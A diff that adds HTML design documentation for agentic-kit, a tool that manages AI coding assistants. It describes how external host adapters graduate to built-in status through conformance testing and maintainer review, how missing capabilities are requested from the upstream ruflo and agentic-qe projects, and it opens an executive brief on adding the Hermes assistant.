+    <rect x="20" y="260" width="190" height="66" rx="9" fill="none" stroke-width="1.6" style="stroke:var(--gov)"/>
+    <text x="115" y="284" text-anchor="middle" font-weight="700">5 · Verify</text>
+    <text x="115" y="302" text-anchor="middle" font-size="10.5" class="lg">reproduce conformance</text>
+    <text x="115" y="316" text-anchor="middle" font-size="10.5" class="lg">+ review the hook scripts</text>
+
+    <rect x="238" y="260" width="132" height="66" rx="9" fill="none" stroke-width="1.6" style="stroke:var(--gov)"/>
+    <text x="304" y="290" text-anchor="middle" font-weight="700">6 · Decide</text>
+    <text x="304" y="308" text-anchor="middle" font-size="10.5" class="lg">which tier?</text>
+    <path d="M210 293 L 234 293" stroke-width="1.5" style="stroke:var(--gov)" marker-end="url(#c1g)"/>
+
+    <!-- Outcome A: bless (external, gold) -->
+    <rect x="410" y="236" width="216" height="60" rx="9" fill="none" stroke-dasharray="5 4" stroke-width="1.5" style="stroke:var(--future)"/>
+    <text x="518" y="258" text-anchor="middle" font-weight="700" style="fill:var(--future)">Bless — stays external</text>
+    <text x="518" y="275" text-anchor="middle" font-size="10" class="lg">curated list, hash-pinned;</text>
+    <text x="518" y="289" text-anchor="middle" font-size="10" class="lg">maintainer vouches, users opt in</text>
+    <path d="M370 280 C 388 268, 396 262, 406 258" fill="none" stroke-width="1.5" style="stroke:var(--future)" marker-end="url(#c1f)"/>
+
+    <!-- Outcome B: promote (built-in, green) -->
+    <rect x="410" y="318" width="216" height="60" rx="9" fill="none" stroke-width="1.7" style="stroke:var(--ok)"/>
+    <text x="518" y="340" text-anchor="middle" font-weight="700" style="fill:var(--ok)">Promote — into the tree</text>
+    <text x="518" y="357" text-anchor="middle" font-size="10" class="lg">becomes a registry entry —</text>
+    <text x="518" y="371" text-anchor="middle" font-size="10" class="lg">a normal PR, now easy</text>
+    <path d="M370 306 C 388 320, 396 336, 406 344" fill="none" stroke-width="1.6" style="stroke:var(--ok)" marker-end="url(#c1k)"/>
+
+    <!-- Release -->
+    <rect x="644" y="318" width="206" height="60" rx="9" fill="none" stroke-width="1.9" style="stroke:var(--ok)"/>
+    <text x="747" y="340" text-anchor="middle" font-weight="800" style="fill:var(--ok)">7 · Release — built-in</text>
+    <text x="747" y="357" text-anchor="middle" font-size="10" class="lg">next version ships it, no flag —</text>
+    <text x="747" y="371" text-anchor="middle" font-size="10" class="lg">full parity, like Claude / Codex</text>
+    <path d="M626 348 L 640 348" stroke-width="1.7" style="stroke:var(--ok)" marker-end="url(#c1k)"/>
+
+    <!-- graduation caption band -->
+    <line x1="20" y1="418" x2="860" y2="418" stroke="currentColor" opacity="0.18"/>
+    <text x="20" y="410" font-size="11" class="lg">Experimental ▸▸▸ every step right is more conformance proven and more trust earned ▸▸▸ full built-in parity</text>
+
+    <!-- legend -->
+    <g font-size="10.5">
+      <rect x="20" y="444" width="16" height="10" rx="2" fill="none" stroke-width="1.5" style="stroke:var(--accent)"/>
+      <text x="42" y="453" class="lg">contributor</text>
+      <rect x="150" y="444" width="16" height="10" rx="2" fill="none" stroke-width="1.5" style="stroke:var(--gov)"/>
+      <text x="172" y="453" class="lg">maintainer</text>
+      <rect x="270" y="444" width="16" height="10" rx="2" fill="none" stroke-dasharray="4 3" stroke-width="1.5" style="stroke:var(--future)"/>
+      <text x="292" y="453" class="lg">external / experimental outcome</text>
+      <rect x="510" y="444" width="16" height="10" rx="2" fill="none" stroke-width="1.7" style="stroke:var(--ok)"/>
+      <text x="532" y="453" class="lg">built-in / shipped outcome</text>
+    </g>
+  </g>
+</svg>
+<figcaption><strong>The full journey.</strong> A contributor can go all the way to step 3 alone —
+publish an adapter, and any user opts in behind the experimental flag. Getting <em>into the kit</em>
+starts at step 4: propose it to the maintainer with conformance evidence. The maintainer reproduces
+that evidence and reads the hook scripts (the only part that executes), then chooses a landing spot —
+a vetted external adapter, or a promotion into the built-in registry that ships in the next release
+with no flag and full parity.</figcaption>
+</figure>
+
+<h3>What each actor actually does</h3>
+<ol class="steps">
+  <li><span class="st">Author the adapter.</span> <span class="tag soon">contributor</span> Write the
+  manifest (host descriptor, detection, driving surfaces, lifecycle hooks, disclosed trust changes)
+  and the small hook scripts that implement each lifecycle verb. This is data and a few subprocess
+  scripts — in the contributor's own repo, their own language.</li>
+  <li><span class="st">Self-test against the conformance kit.</span> <span class="tag soon">contributor</span>
+  The kit ships a black-box harness: it admits the adapter through the real gate, runs its hooks as
+  real subprocesses, and refuses a corpus of bad manifests with exact reasons. The contributor
+  iterates until it reports a clean pass. <em>Conformance is objective</em> — the same harness the
+  maintainer will run, so there are no surprises at review time.</li>
+  <li><span class="st">Publish.</span> <span class="tag soon">contributor</span> They ship the manifest
+  from their own repo. At this point any user can already opt in — behind
+  <code>AK_EXPERIMENTAL_HOST_ADAPTERS=1</code>, with hash-pinned consent. This path needs
+  <em>nothing</em> from the maintainer; it's the permissionless escape valve. It stays experimental.</li>
+  <li><span class="st">Propose it.</span> <span class="tag soon">contributor</span> To get it vetted or
+  into the kit, they open a PR/issue attaching the conformance report — the numeric, reproducible
+  pass. That report is the currency of the conversation.</li>
+  <li><span class="st">Verify.</span> <span class="tag flag">maintainer</span> The maintainer re-runs
+  the conformance kit against the adapter (black-box, reproducible) and <em>reads the hook scripts</em>
+  — the one part that executes — with the same adversarial review discipline the rest of the kit
+  gets. Conformance evidence + an independent reproduction + a hook read = the basis for trust. The
+  maintainer never had to run the contributor's code inside the kit to evaluate it.</li>
+  <li><span class="st">Decide the tier.</span> <span class="tag flag">maintainer</span> Based on which
+  conformance tiers passed, the maintainer chooses where it lands:
+    <ul>
+      <li><strong>Bless it as a curated external adapter</strong> <span class="tag soon">stays external</span>
+      — add it to a vetted list with its manifest hash pinned. Users still opt in themselves, but now
+      with the maintainer's vouch behind it. Lightweight; good for niche or long-tail hosts the kit
+      doesn't want to own. Still experimental, still capped by what it earned.</li>
+      <li><strong>Promote it into the tree</strong> <span class="tag now">becomes built-in</span> —
+      adopt its host descriptor as a built-in registry entry. Because of the registry-driven refactor
+      this whole effort delivered, that's a <em>normal, small PR</em> — an entry plus a lifecycle
+      adapter plus an About card, following the established pattern. No open-heart surgery.</li>
+    </ul>
+  </li>
+  <li><span class="st">Release.</span> <span class="tag now">maintainer</span> The promotion PR goes
+  through the ordinary release process — CI, review, merge. The next version of agentic-kit ships the
+  host as a <strong>first-class built-in</strong>: it appears for every user with no flag, no
+  manifest, no consent step, participating exactly like Claude, Codex, and OpenCode. The caps are gone
+  because it's now code the maintainer vouches for — that's what graduation <em>means</em>.</li>
+</ol>
+
+<div class="panel">
+  <div class="ptitle">So, concretely, "a release with Hermes built in"</div>
+  <p style="margin-bottom:0">Hermes graduates: its author gets it passing the conformance kit and
+  proposes it; the maintainer reproduces the pass and reviews its hooks; the maintainer promotes its
+  descriptor into the built-in registry (a small PR, thanks to the groundwork); it rides a normal
+  release. From that version on, Hermes is one of the built-in hosts — indistinguishable from
+  Claude/Codex/OpenCode to a user — and its adapter code either ships as bundled hook scripts or gets
+  reimplemented as in-process glue, the maintainer's call. The experimental external-adapter door was
+  the <em>proving ground</em>; being built-in is the diploma.</p>
+</div>
+
+<h2 id="upstream">8 · Some ceilings aren't ours to lift — the upstream path</h2>
+<p>agentic-kit doesn't stand alone. It sits <em>downstream</em> of two other systems: <strong>ruflo</strong>,
+which orchestrates the agent loop, and <strong>agentic-qe</strong>, which runs quality. A host's full
+participation touches all three layers — and that means a contributor chasing a conformance tier can
+hit a ceiling that <em>agentic-kit cannot lift</em>, because the missing capability lives upstream.
+When that happens, the answer isn't "blocked forever" — it's a deliberate request, carried upstream,
+that lights up in the kit once it ships.</p>
+
+<figure>
+<svg viewBox="0 0 880 430" role="img"
+  aria-label="Three-layer stack: a contributor's adapter meets agentic-kit, the integrator, which depends on ruflo (orchestration) and agentic-qe (quality). Most conformance gaps are fixed in agentic-kit; some are upstream, sent as capability requests that light up in the kit when upstream ships.">
+  <defs>
+    <marker id="s1c" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7.5" markerHeight="7.5" orient="auto"><path d="M0,0 L10,5 L0,10 z" style="fill:var(--accent)"/></marker>
+    <marker id="s1f" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7.5" markerHeight="7.5" orient="auto"><path d="M0,0 L10,5 L0,10 z" style="fill:var(--future)"/></marker>
+    <marker id="s1k" viewBox="0 0 10 10" refX="9" refY="5" markerWidth="7.5" markerHeight="7.5" orient="auto"><path d="M0,0 L10,5 L0,10 z" style="fill:var(--ok)"/></marker>
+  </defs>
+  <g font-size="12" fill="currentColor" font-family="-apple-system, sans-serif">
+    <!-- adapter -->
+    <rect x="336" y="16" width="208" height="48" rx="9" fill="none" stroke-width="1.6" style="stroke:var(--accent)"/>
+    <text x="440" y="38" text-anchor="middle" font-weight="700" style="fill:var(--accent)">Contributor's adapter</text>
+    <text x="440" y="54" text-anchor="middle" font-size="10.5" class="lg">reaching for a conformance tier</text>
+    <path d="M440 64 L 440 96" stroke-width="1.6" style="stroke:var(--accent)" marker-end="url(#s1c)"/>
+    <text x="448" y="84" text-anchor="start" font-size="10.5" class="lg">conformance</text>
+
+    <!-- agentic-kit integrator -->
+    <rect x="150" y="100" width="580" height="86" rx="11" fill="none" stroke-width="2" stroke="currentColor"/>
+    <text x="440" y="126" text-anchor="middle" font-weight="800" font-size="14">agentic-kit — the integrator</text>
+    <text x="440" y="146" text-anchor="middle" font-size="11" class="lg">the host registry · the adapter contract · execution · consistency</text>
+    <text x="440" y="171" text-anchor="middle" font-size="11" style="fill:var(--ok)">Most conformance gaps are fixed right here — a normal agentic-kit PR.</text>
+
+    <!-- ruflo substrate -->
+    <rect x="40" y="300" width="330" height="104" rx="11" fill="none" stroke-width="1.6" stroke="currentColor"/>
+    <text x="205" y="326" text-anchor="middle" font-weight="700">ruflo — orchestration substrate</text>
+    <text x="205" y="345" text-anchor="middle" font-size="10.5" class="lg">drives the loop · memory · routing · swarms</text>
+    <text x="205" y="362" text-anchor="middle" font-size="10.5" class="lg">host backends are ENABLE_* targets,</text>
+    <text x="205" y="377" text-anchor="middle" font-size="10.5" class="lg">defined inside ruflo, not from outside</text>
+    <text x="205" y="394" text-anchor="middle" font-size="10" style="fill:var(--future)">ask: register a new host backend</text>
+
+    <!-- aqe substrate -->
+    <rect x="510" y="300" width="330" height="104" rx="11" fill="none" stroke-width="1.6" stroke="currentColor"/>
+    <text x="675" y="326" text-anchor="middle" font-weight="700">agentic-qe — quality substrate</text>
+    <text x="675" y="345" text-anchor="middle" font-size="10.5" class="lg">test gen · coverage · quality court</text>
+    <text x="675" y="362" text-anchor="middle" font-size="10.5" class="lg">the provider list is a closed upstream</text>
+    <text x="675" y="377" text-anchor="middle" font-size="10.5" class="lg">enum — a host can't self-add as one</text>
+    <text x="675" y="394" text-anchor="middle" font-size="10" style="fill:var(--future)">ask: a provider-plugin API</text>
+
+    <!-- request down (gold dashed) : ruflo -->
+    <path d="M320 186 C 250 224, 210 256, 195 296" fill="none" stroke-width="1.5" stroke-dasharray="6 4" style="stroke:var(--future)" marker-end="url(#s1f)"/>
+    <text x="150" y="238" text-anchor="middle" font-size="10" style="fill:var(--future)">capability request ↓</text>
+    <!-- ship up (green) : ruflo -->
+    <path d="M245 296 C 275 256, 305 224, 336 188" fill="none" stroke-width="1.5" style="stroke:var(--ok)" marker-end="url(#s1k)"/>
+    <text x="330" y="252" text-anchor="middle" font-size="10" style="fill:var(--ok)">ships → lights up ↑</text>
+
+    <!-- request down : aqe -->
+    <path d="M560 186 C 630 224, 670 256, 685 296" fill="none" stroke-width="1.5" stroke-dasharray="6 4" style="stroke:var(--future)" marker-end="url(#s1f)"/>
+    <text x="730" y="238" text-anchor="middle" font-size="10" style="fill:var(--future)">capability request ↓</text>
+    <!-- ship up : aqe -->
+    <path d="M635 296 C 605 256, 575 224, 544 188" fill="none" stroke-width="1.5" style="stroke:var(--ok)" marker-end="url(#s1k)"/>
+    <text x="550" y="252" text-anchor="middle" font-size="10" style="fill:var(--ok)">ships → lights up ↑</text>
+  </g>
+</svg>
+<figcaption><strong>Downstream, but not powerless.</strong> When a conformance ceiling is really an
+upstream one, the kit doesn't fake it or bury it — it files a specific capability request against
+ruflo or agentic-qe, tracks the tier as "gated on upstream," and exposes the capability the moment
+the upstream release lands. The dashed gold arrows are the ask; the green arrows are the payoff.</figcaption>
+</figure>
+
+<h3>Which layer owns the blocker?</h3>
+<p>The first diagnostic when a conformance tier can't be met: <em>whose capability is missing?</em></p>
+<div class="tablewrap"><table>
+  <tr><th>The blocker</th><th>Owner</th><th>What happens</th></tr>
+  <tr><td>Can't run work through the host; no trust command; local-file manifests only</td>
+      <td><strong style="color:var(--ok)">agentic-kit</strong></td>
+      <td>The kit's to fix — a normal kit PR. This is the on-ramp work, no one to wait on.</td></tr>
+  <tr><td>Host wants to be a recognized <em>AQE provider type</em></td>
+      <td><strong style="color:var(--gov)">agentic-qe</strong></td>
+      <td>Upstream — the provider list is a closed enum. Request a provider-plugin API. <em>Interim:</em> QE works through the model provider underneath the host, so quality isn't blocked, only the host's own AQE identity is.</td></tr>
+  <tr><td>Host wants to be a native ruflo <em>backend</em> (drive the loop, an ENABLE_* target)</td>
+      <td><strong style="color:var(--gov)">ruflo</strong></td>
+      <td>Upstream — backends are defined in ruflo. Request a documented backend-registration path. <em>Interim:</em> the host runs through the kit's own supervised execution, just not as a ruflo-native backend.</td></tr>
+  <tr><td>Host wants to participate in the QE quality gate</td>
+      <td><strong style="color:var(--ok)">agentic-kit</strong></td>
+      <td>Mostly the kit's — adopt an anchor set. Not blocked upstream.</td></tr>
+</table></div>
+
+<div class="panel">
+  <div class="ptitle">The request path, and why it's credible</div>
+  <p style="margin-bottom:0">A capability request isn't a wish into the void. The kit's maintainer
+  <em>champions</em> it upstream — the same maintainer already contributes to these projects — with a
+  concrete extension point named, not a vague "please support us." The pending dependency is recorded
+  against the conformance tier (<code>gated: agentic-qe#NNN</code>), so anyone reading an adapter's
+  status can see exactly what it's waiting on and why. When the upstream release ships the capability,
+  the kit exposes it in the adapter contract and the tier flips from gated to earnable. This is what
+  keeps "no limitations after conformance" honest: the limitations that <em>are</em> real get a
+  documented route to disappear, layer by layer.</p>
+</div>
+
+<h2 id="opencode-example">9 · OpenCode in practice — a worked example</h2>
+<p>All of this becomes concrete with a host that's already here. OpenCode is a <em>built-in</em>, ak
+installs and configures it, and a user can open the OpenCode CLI on a project and get real benefit —
+yet it isn't a full peer on every layer. Here's exactly what it gets, what it doesn't, and — the
+useful part — <em>who owns each gap</em>. It's the whole three-layer story in one host.</p>
+
+<div class="cols">
+  <div class="card" style="border-top:3px solid var(--ok)">
+    <h3 style="color:var(--ok)">What OpenCode gets <span class="tag now">wired by ak</span></h3>
+    <p class="quiet" style="margin-top:0">On an ak-configured project, opening the OpenCode CLI comes with:</p>
+    <ul>
+      <li><strong>Ruflo's full MCP server</strong> — memory, routing, swarm tools, registered in
+      OpenCode's own config and auto-approved.</li>
+      <li><strong>RuvNet Brain MCP</strong> — grounding in rUv source.</li>
+      <li><strong>Ruflo lifecycle hooks</strong> — OpenCode's own edit/tool/task events wired to
+      ruflo, so learning fires as work happens.</li>
+      <li><strong>Managed ruflo agents, skills, and AGENTS.md guidance</strong> projected in.</li>
+    </ul>
+    <p class="meta" style="margin-bottom:0">The orchestration + grounding layers: fully first-class.</p>
+  </div>
+  <div class="card" style="border-top:3px solid var(--caution)">
+    <h3 style="color:var(--caution)">What it doesn't — and who owns it</h3>
+    <ul>
+      <li><strong>It never leads</strong> (never primary) — <span class="quiet">by design; it's a
+      supervised host.</span></li>
+      <li><strong>agentic-qe tools/skills aren't projected in</strong> (unlike Claude &amp; Codex) —
+      <span class="quiet">ak's choice; ak could run aqe's OpenCode installer and doesn't yet.</span></li>
+      <li><strong>It isn't an AQE provider type</strong> (analysis can't run <em>on</em> it) —
+      <span class="quiet">upstream; agentic-qe's provider list is a closed enum.</span></li>
+      <li><strong>No command status-line footer, no quota surface, no cross-host bridge</strong> —
+      <span class="quiet">by design.</span></li>
+    </ul>
+  </div>
+</div>
+
+<div class="panel">
+  <div class="ptitle">The pattern, in one host</div>
+  <p style="margin-bottom:0">OpenCode is a <strong>first-class ruflo + brain host</strong>, a
+  <strong>supervised (never-leading) execution host</strong>, and largely <strong>outside the
+  agentic-qe layer</strong> — and that last gap splits cleanly the way
+  <a href="#upstream">section&nbsp;8</a> describes: "no aqe tools projected in" is <em>ak's</em> to
+  close (a normal kit change), while "can't be an AQE provider type" is an <em>upstream</em> request
+  to agentic-qe. That's the entire model — host layer, lead vs. supervised, and the ak-vs-upstream
+  split — visible in a single assistant available today.</p>
+</div>
+
+<hr class="soft">
+<p class="meta">Built-in host behavior is authoritative in ADR-0016; the external-adapter extension
+point and its safety model are ADR-0029 (which supersedes ADR-0016's original "closed registry"
+stance, narrowly — nothing under a manifest is ever loaded into the kit's process). The graduation
+ladder — experimental external adapter, earned capabilities via conformance tiers, promotion to
+built-in, and the upstream capability-request path to ruflo and agentic-qe — is the proposed next
+decision (a prospective ADR-0031), not yet ratified. Upstream facts (agentic-qe's closed provider
+enum; ruflo's ENABLE_* backend model) are grounded in a source-cited research sweep of
+<code>agentic-qe@3.13.10</code> and <code>ruvnet/ruflo@45e65b5</code>. Hermes and Gemini CLI are named
+here as illustrative candidates for the external door, not as hosts the kit supports today.</p>
+
+</main>
+
+</body>
+</html>

--- a/docs/HOST-PROVIDER-CONSISTENCY.html
+++ b/docs/HOST-PROVIDER-CONSISTENCY.html
@@ -1,0 +1,613 @@
+<!doctype html>
+<html lang="en">
+<head>
+<meta charset="utf-8">
+<meta name="viewport" content="width=device-width, initial-scale=1">
+<title>Host &amp; Provider Consistency — agentic-kit</title>
+<style>
+  :root {
+    --bg: #f5f7f8;
+    --surface: #ffffff;
+    --surface-2: #eef1f3;
+    --ink: #1a222c;
+    --muted: #5b6673;
+    --line: #d9dfe4;
+    --accent: #266e73;
+    --accent-soft: #e2eeef;
+    --sev-blocker: #a93a2c;
+    --sev-blocker-bg: #f7e5e1;
+    --sev-major: #8f6400;
+    --sev-major-bg: #f6edd6;
+    --sev-minor: #4a6180;
+    --sev-minor-bg: #e6ecf3;
+    --sev-ok: #2c7a4b;
+    --sev-ok-bg: #e2f0e7;
+    --code-bg: #eceff1;
+    --shadow: 0 1px 2px rgba(26, 34, 44, 0.06);
+  }
+  @media (prefers-color-scheme: dark) {
+    :root:not([data-theme="light"]) {
+      --bg: #14181b;
+      --surface: #1b2126;
+      --surface-2: #21282e;
+      --ink: #e3e8ec;
+      --muted: #96a1ab;
+      --line: #2c343b;
+      --accent: #72c0c5;
+      --accent-soft: #1e3336;
+      --sev-blocker: #e08a7c;
+      --sev-blocker-bg: #3a231f;
+      --sev-major: #d9b25e;
+      --sev-major-bg: #352c17;
+      --sev-minor: #9db4d0;
+      --sev-minor-bg: #232c37;
+      --sev-ok: #85c9a1;
+      --sev-ok-bg: #1d3226;
+      --code-bg: #242b31;
+      --shadow: none;
+    }
+  }
+  :root[data-theme="dark"] {
+    --bg: #14181b;
+    --surface: #1b2126;
+    --surface-2: #21282e;
+    --ink: #e3e8ec;
+    --muted: #96a1ab;
+    --line: #2c343b;
+    --accent: #72c0c5;
+    --accent-soft: #1e3336;
+    --sev-blocker: #e08a7c;
+    --sev-blocker-bg: #3a231f;
+    --sev-major: #d9b25e;
+    --sev-major-bg: #352c17;
+    --sev-minor: #9db4d0;
+    --sev-minor-bg: #232c37;
+    --sev-ok: #85c9a1;
+    --sev-ok-bg: #1d3226;
+    --code-bg: #242b31;
+    --shadow: none;
+  }
+
+  * { box-sizing: border-box; }
+  body {
+    background: var(--bg);
+    color: var(--ink);
+    font-family: system-ui, -apple-system, "Segoe UI", sans-serif;
+    line-height: 1.55;
+    margin: 0;
+    font-size: 15.5px;
+  }
+  .wrap { max-width: 920px; margin: 0 auto; padding: 3rem 1.5rem 6rem; }
+  code, .mono {
+    font-family: ui-monospace, "SF Mono", Menlo, Consolas, monospace;
+    font-size: 0.86em;
+    background: var(--code-bg);
+    border-radius: 3px;
+    padding: 0.08em 0.32em;
+  }
+  th code, td code { white-space: nowrap; }
+  h1, h2, h3, h4 { line-height: 1.25; text-wrap: balance; letter-spacing: -0.01em; }
+  h1 { font-size: 1.9rem; margin: 0.4rem 0 0.6rem; }
+  h2 {
+    font-size: 1.28rem; margin: 3.2rem 0 0.9rem;
+    padding-top: 1.6rem; border-top: 1px solid var(--line);
+  }
+  h3 { font-size: 1.05rem; margin: 1.8rem 0 0.5rem; }
+  p { max-width: 72ch; margin: 0.65rem 0; }
+  ul, ol { max-width: 72ch; padding-left: 1.4rem; }
+  li { margin: 0.3rem 0; }
+  a { color: var(--accent); text-decoration: none; }
+  a:hover, a:focus-visible { text-decoration: underline; }
+  a:focus-visible { outline: 2px solid var(--accent); outline-offset: 2px; }
+
+  .eyebrow {
+    text-transform: uppercase; letter-spacing: 0.12em; font-size: 0.72rem;
+    font-weight: 650; color: var(--accent); margin: 0;
+  }
+  .meta {
+    display: flex; flex-wrap: wrap; gap: 0.4rem 1.4rem;
+    color: var(--muted); font-size: 0.85rem; margin: 0.4rem 0 0;
+  }
+  .lede { font-size: 1.02rem; color: var(--muted); max-width: 68ch; }
+
+  nav.toc {
+    background: var(--surface); border: 1px solid var(--line); border-radius: 8px;
+    padding: 1rem 1.3rem; margin: 1.8rem 0 0; box-shadow: var(--shadow);
+    font-size: 0.9rem; columns: 2; column-gap: 2.5rem;
+  }
+  nav.toc a { display: block; padding: 0.14rem 0; break-inside: avoid; }
+  @media (max-width: 640px) { nav.toc { columns: 1; } }
+
+  .chip {
+    display: inline-block; font-size: 0.68rem; font-weight: 700;
+    text-transform: uppercase; letter-spacing: 0.06em;
+    border-radius: 999px; padding: 0.14em 0.6em; white-space: nowrap;
+  }
+  .chip.blocker { color: var(--sev-blocker); background: var(--sev-blocker-bg); }
+  .chip.major   { color: var(--sev-major);   background: var(--sev-major-bg); }
+  .chip.minor   { color: var(--sev-minor);   background: var(--sev-minor-bg); }
+  .chip.ok      { color: var(--sev-ok);      background: var(--sev-ok-bg); }
+  .chip.today   { color: var(--accent);      background: var(--accent-soft); }
+  .chip.ext     { color: var(--muted);       background: var(--surface-2); }
+
+  .tablewrap { overflow-x: auto; margin: 1rem 0; border: 1px solid var(--line); border-radius: 8px; background: var(--surface); box-shadow: var(--shadow); }
+  table { border-collapse: collapse; width: 100%; font-size: 0.87rem; }
+  th {
+    text-align: left; font-size: 0.7rem; text-transform: uppercase; letter-spacing: 0.08em;
+    color: var(--muted); padding: 0.6rem 0.85rem; border-bottom: 1px solid var(--line);
+    background: var(--surface-2); white-space: nowrap;
+  }
+  td { padding: 0.6rem 0.85rem; border-bottom: 1px solid var(--line); vertical-align: top; }
+  tr:last-child td { border-bottom: none; }
+  td.id { font-family: ui-monospace, "SF Mono", Menlo, Consolas, monospace; font-size: 0.8rem; font-weight: 700; color: var(--accent); white-space: nowrap; }
+  td.nowrap { white-space: nowrap; }
+
+  .decision {
+    background: var(--surface); border: 1px solid var(--line); border-radius: 8px;
+    padding: 1.2rem 1.4rem 1.1rem; margin: 1.4rem 0; box-shadow: var(--shadow);
+  }
+  .decision h3 { margin: 0 0 0.2rem; }
+  .decision .dq { color: var(--muted); font-size: 0.92rem; margin: 0 0 0.8rem; }
+  .opt { margin: 0.55rem 0; padding-left: 1.9rem; position: relative; max-width: 72ch; }
+  .opt b.tag {
+    position: absolute; left: 0; top: 0.1rem; font-size: 0.72rem; font-weight: 750;
+    color: var(--muted); font-family: ui-monospace, "SF Mono", Menlo, Consolas, monospace;
+  }
+  .rec {
+    margin-top: 0.9rem; padding: 0.7rem 1rem; border-left: 3px solid var(--accent);
+    background: var(--accent-soft); border-radius: 0 6px 6px 0; font-size: 0.93rem;
+    max-width: 72ch;
+  }
+  .rec b:first-child { color: var(--accent); text-transform: uppercase; font-size: 0.72rem; letter-spacing: 0.08em; }
+
+  .phase {
+    border: 1px solid var(--line); border-left: 3px solid var(--accent);
+    border-radius: 0 8px 8px 0; background: var(--surface);
+    padding: 1rem 1.3rem; margin: 1rem 0; box-shadow: var(--shadow);
+  }
+  .phase h3 { margin: 0 0 0.3rem; }
+  .phase .ph-meta { color: var(--muted); font-size: 0.83rem; margin-bottom: 0.5rem; }
+
+  .callout {
+    border: 1px solid var(--line); background: var(--surface-2); border-radius: 8px;
+    padding: 0.9rem 1.2rem; margin: 1.2rem 0; font-size: 0.94rem; max-width: 76ch;
+  }
+  section.brief {
+    background: var(--surface); border: 1px solid var(--line); border-top: 3px solid var(--accent);
+    border-radius: 8px; padding: 1.4rem 1.6rem 1.5rem; margin: 2rem 0 0.5rem;
+    box-shadow: var(--shadow);
+  }
+  section.brief h2 { border-top: none; padding-top: 0; margin: 0 0 0.2rem; }
+  section.brief h3 { font-size: 0.98rem; margin: 1.3rem 0 0.35rem; }
+  section.brief p, section.brief li { font-size: 0.97rem; }
+  section.brief .audience { color: var(--muted); font-size: 0.88rem; margin-top: 0; }
+  .footer { margin-top: 4rem; padding-top: 1.2rem; border-top: 1px solid var(--line); color: var(--muted); font-size: 0.82rem; }
+</style>
+</head>
+<body>
+<div style="max-width:76ch;margin:1.4rem auto 0;padding:.55rem .95rem;background:var(--surface);border:1px solid var(--line);border-left:3px solid var(--accent);border-radius:8px;font-size:.82rem;line-height:1.5;color:var(--muted)">📎 <strong style="color:var(--accent)">Origin.</strong> Authored as a Claude artifact; this file is the repository’s local snapshot for review. Live version: <a href="https://claude.ai/code/artifact/db1bae65-adf9-45f1-80f1-163dcc1af50c" style="color:var(--accent)">https://claude.ai/code/artifact/db1bae65-adf9-45f1-80f1-163dcc1af50c</a></div>
+
+<div class="wrap">
+  <p class="eyebrow">agentic-kit · master consistency document</p>
+  <h1>Host &amp; provider axis — findings, gaps, options, recommendations</h1>
+  <p class="meta">
+    <span>Prepared 2026-08-13 · rev 2 (executive brief added)</span>
+    <span>Trigger: <a href="https://github.com/pacphi/agentic-kit/pull/131">PR #131</a> (ADR-0028/0029/0030, adrianco)</span>
+    <span>Repo: pacphi/agentic-kit @ main (8aad47b)</span>
+  </p>
+  <p class="lede">
+    Every claim below was verified against source: the ak side by a full surface sweep of the
+    repository, the Hermes side against NousResearch/hermes-agent HEAD (v0.20.0, 2026-08-13).
+    Finding IDs (F-nn) and decision IDs (D-n) are stable and cross-referenced by the roadmap
+    and the PR #131 review response.
+  </p>
+
+  <section class="brief" id="brief">
+    <h2>0 · Executive brief — in plain language</h2>
+    <p class="audience">For every consumer of agentic-kit — no engineering background needed.
+    Everything after this section is the technical evidence behind this summary.</p>
+
+    <h3>What agentic-kit is</h3>
+    <p>
+      agentic-kit ("ak") is a set-up and housekeeping tool for AI coding assistants. Today it
+      manages three of them — Claude Code, Codex, and OpenCode. It installs them, keeps their
+      settings consistent, routes different kinds of work to the assistant best suited for it,
+      and reports on what they did and roughly what it cost.
+    </p>
+
+    <h3>The problem</h3>
+    <p>
+      A contributor asked us to support a fourth assistant — Hermes, notable because it drives
+      AI models that run entirely on your own computer instead of in a vendor's cloud. Studying
+      that request exposed something broader: the kit does not treat its three current
+      assistants evenly. Under the hood, roughly half of the kit treats "an assistant" as a
+      generic thing any newcomer could slot into; the other half has the three names written in
+      by hand. In practice, some features quietly apply to only one or two assistants, a
+      newcomer would be invisible to most of the kit — and, worst of all, a few reports file
+      activity from an unrecognized assistant <em>under the wrong name</em> instead of saying
+      "unrecognized."
+    </p>
+
+    <h3>The challenges</h3>
+    <ul>
+      <li><b>Adding an assistant today is open-heart surgery.</b> The last time we added one it
+      touched roughly fourteen files and eight test suites — and permanently made the kit's
+      maintainer responsible for software they don't personally use.</li>
+      <li><b>Assistants differ in ways users must be told about.</b> Example: in unattended
+      mode, Hermes approves every action automatically, by its own design — where OpenCode
+      pauses and asks. The kit has to state differences like that plainly, never average them
+      away.</li>
+      <li><b>The bookkeeping isn't honest yet.</b> Usage and session reports currently mis-file
+      unknown assistants into an existing bucket rather than labeling them truthfully. That is
+      a correctness problem today, not a someday problem.</li>
+      <li><b>Changing course must happen on the record.</b> An earlier design decision
+      deliberately said "no third-party plug-ins." Opening a plug-in door means revisiting that
+      decision explicitly, with its trade-offs written down — not quietly working around it.</li>
+    </ul>
+
+    <h3>The planned work, in phases</h3>
+    <ul>
+      <li><b>Phase 0 — Truthfulness fixes.</b> Stop mis-filing unknown assistants; replace
+      silences with plain labels ("this assistant has no usage report"); remove duplicated and
+      dead configuration. These are owed no matter what else is decided.</li>
+      <li><b>Phase 1 — Local models, generically.</b> Recognize any locally-run model server
+      (LM Studio, llama.cpp, MLX, vLLM, and whatever comes next) — not just one vendor — so
+      people running models on their own machines are first-class citizens.</li>
+      <li><b>Phase 2 — The plug-in door.</b> Rework the kit's insides so an assistant is
+      something the kit <em>looks up</em> rather than something <em>written into it</em>. Then,
+      if the decision to open up is confirmed, publish one well-tested connection point so a
+      new assistant can be added by the people who want it.</li>
+      <li><b>Phase 3 — Hermes, and honest labels everywhere.</b> Hermes arrives as the first
+      plug-in, maintained by its proposer rather than by us. Every status screen learns to say
+      what each assistant can and cannot do — and why.</li>
+      <li><b>Phase 4 — Parked, on purpose.</b> Ideas that need more real-world evidence first
+      (deeper usage reporting for plug-ins, a stronger isolation model) are listed and
+      deferred, not forgotten.</li>
+    </ul>
+
+    <h3>What you get at the end</h3>
+    <p>
+      Whichever assistants you use: the same commands work the same way, reports name things
+      truthfully, and capability differences are stated rather than hidden. Adding tomorrow's
+      assistant no longer depends on one maintainer's spare time. And one thing deliberately
+      does <em>not</em> change: the kit never installs a plug-in on its own — you choose one
+      explicitly, and the kit tells you exactly what it is and what it is allowed to do before
+      anything runs.
+    </p>
+  </section>
+
